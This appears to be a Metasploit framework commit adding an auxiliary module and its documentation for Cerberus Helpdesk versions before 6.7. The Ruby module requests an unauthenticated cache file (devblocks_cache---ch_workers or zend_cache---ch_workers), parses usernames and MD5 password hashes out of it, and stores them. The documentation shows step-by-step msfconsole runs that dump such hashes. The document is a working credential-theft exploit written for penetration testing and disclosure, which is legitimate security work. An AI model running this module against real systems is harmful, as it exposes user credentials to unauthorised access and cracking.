Land rapid7#8575, Cerberus Helpdesk hash disclosure

Author: pbarry-r7

documentation/modules/auxiliary/gather/cerberus_helpdesk_hash_disclosure.md

@@ -0,0 +1,82 @@
+## Description
+
+This module opens a `devblocks_cache---ch_workers` or `zend_cache---ch_workers` file which contains a
+data structure with username and password hash (MD5) credentials.  The contents looks similar to JSON, however it is not.
+
+## Vulnerable Application
+
+This module has been verified against the following Cerberus Helpdesk versions:
+
+1. Version 4.2.3 Stable (Build 925)
+2. Version 5.4.4
+
+However it may also work up to, but not including, version 6.7
+
+Version 5.4.4 is available on [exploit-db.com](https://www.exploit-db.com/apps/882596e791e54529b29ecbc6f48a6cb7-cerb5-5_4_4.zip)
+
+* of note, 5.4.4 has to be installed on a PRE php7 environment.
+
+## Verification Steps
+
+1. Start msfconsole
+2. ```use auxiliary/gather/cerberus_helpdesk_hash_disclosure```
+3. ```set rhosts [rhosts]```
+4. ```run```
+
+## Scenarios
+
+### 4.2.3 using zend (not verbose)
+
+  ```
+    msf > use auxiliary/gather/cerberus_helpdesk_hash_disclosure
+    msf auxiliary(cerberus_helpdesk_hash_disclosure) > set rhosts 1.1.1.1
+    rhosts => 1.1.1.1
+    msf auxiliary(cerberus_helpdesk_hash_disclosure) > run
+    
+    [-] Invalid response received for 1.1.1.1    for /storage/tmp/devblocks_cache---ch_workers
+    [+] Found: admin:aaa34a6111abf0bd1b1c4d7cd7ebb37b
+    [+] Found: example:112302c209fe8d73f502c132a3da2b1c
+    [+] Found: foobar:0d108d09e5bbe40aade3de5c81e9e9c7
+    
+    Cerberus Helpdesk User Credentials
+    ==================================
+    
+     Username                     Password Hash
+     --------                     -------------
+     admin                        aaa34a6111abf0bd1b1c4d7cd7ebb37b
+     example                      112302c209fe8d73f502c132a3da2b1c
+     foobar                       0d108d09e5bbe40aade3de5c81e9e9c7
+    
+    [*] Scanned 1 of 1 hosts (100% complete)
+    [*] Auxiliary module execution completed
+  ```
+
+### 5.4.4 using devblocks
+
+  ```
+    msf > use auxiliary/gather/cerberus_helpdesk_hash_disclosure 
+    msf auxiliary(cerberus_helpdesk_hash_disclosure) > set rhosts 192.168.2.45
+    rhosts => 192.168.2.45
+    msf auxiliary(cerberus_helpdesk_hash_disclosure) > set targeturi /cerb5/
+    targeturi => /cerb5/
+    msf auxiliary(cerberus_helpdesk_hash_disclosure) > set verbose true
+    verbose => true
+    msf auxiliary(cerberus_helpdesk_hash_disclosure) > run
+    
+    [*] Attempting to load data from /cerb5/storage/tmp/devblocks_cache---ch_workers
+    [+] Found: [email protected]:37b51d194a7513e45b56f6524f2d51f2
+    [+] Found: [email protected]:acbd18db4cc2f85cedef654fccc4a4d8
+    [+] Found: [email protected]:18126e7bd3f84b3f3e4df094def5b7de
+    
+    Cerberus Helpdesk User Credentials
+    ==================================
+    
+     Username                     Password Hash
+     --------                     -------------
+     [email protected]                 37b51d194a7513e45b56f6524f2d51f2
+     [email protected]                 acbd18db4cc2f85cedef654fccc4a4d8
+     [email protected]            18126e7bd3f84b3f3e4df094def5b7de
+    
+    [*] Scanned 1 of 1 hosts (100% complete)
+    [*] Auxiliary module execution completed
+  ```

modules/auxiliary/gather/cerberus_helpdesk_hash_disclosure.rb

@@ -0,0 +1,87 @@
+##
+# This module requires Metasploit: http://metasploit.com/download
+# Current source: https://github.com/rapid7/metasploit-framework
+##
+
+class MetasploitModule < Msf::Auxiliary
+
+  include Msf::Exploit::Remote::HttpClient
+  include Msf::Auxiliary::Scanner
+  include Msf::Auxiliary::Report
+
+  def initialize
+    super(
+      'Name'         => 'Cerberus Helpdesk User Hash Disclosure',
+      'Description'  => %q{
+        This module extracts usernames and password hashes from the Cerberus Helpdesk
+        through an unauthenticated access to a workers file.
+        Verified on Version 4.2.3 Stable (Build 925) and 5.4.4
+        },
+      'References'   =>
+        [
+          [ 'EDB', '39526' ]
+        ],
+      'Author'       =>
+        [
+          'asdizzle_', # discovery
+          'h00die',    # module
+        ],
+      'License'      => MSF_LICENSE,
+      'DisclosureDate' => 'Mar 7 2016'
+    )
+
+    register_options(
+      [
+        OptString.new('TARGETURI', [false, 'URL of the Cerberus Helpdesk root', '/'])
+      ])
+  end
+
+  def run_host(rhost)
+    begin
+      ['devblocks', 'zend'].each do |site|
+        url = normalize_uri(datastore['TARGETURI'], 'storage', 'tmp', "#{site}_cache---ch_workers")
+        vprint_status("Attempting to load data from #{url}")
+        res = send_request_cgi({'uri' => url})
+        if !res
+          print_error("#{peer} Unable to connect to #{url}")
+          next
+        end
+
+        if !res.body.include?('pass')
+          print_error("Invalid response received for #{peer} for #{url}")
+          next
+        end
+
+        cred_table = Rex::Text::Table.new 'Header'  => 'Cerberus Helpdesk User Credentials',
+                                          'Indent'  => 1,
+                                          'Columns' => ['Username', 'Password Hash']
+
+        # the returned object looks json-ish, but it isn't. Unsure of format, so we'll do some ugly manual parsing.
+        # this will be a rough equivalent to sed -e 's/s:5/\n/g' | grep email | cut -d '"' -f4,8 | sed 's/"/:/g'
+        result = res.body.split('s:5')
+        result.each do |cred|
+          if cred.include?('email')
+            cred = cred.split(':')
+            username = cred[3].tr('";', '') # remove extra characters
+            username = username[0...-1] # also remove trailing s
+            password_hash = cred[7].tr('";', '') # remove extra characters
+            print_good("Found: #{username}:#{password_hash}")
+            store_valid_credential(
+              user:         username,
+              private:      password_hash,
+              private_type: :nonreplayable_hash
+            )
+            cred_table << [username, password_hash]
+          end
+        end
+        print_line
+        print_line cred_table.to_s
+        break
+      end
+
+    rescue ::Rex::ConnectionError
+      print_error("#{peer} Unable to connect to site")
+      return
+    end
+  end
+end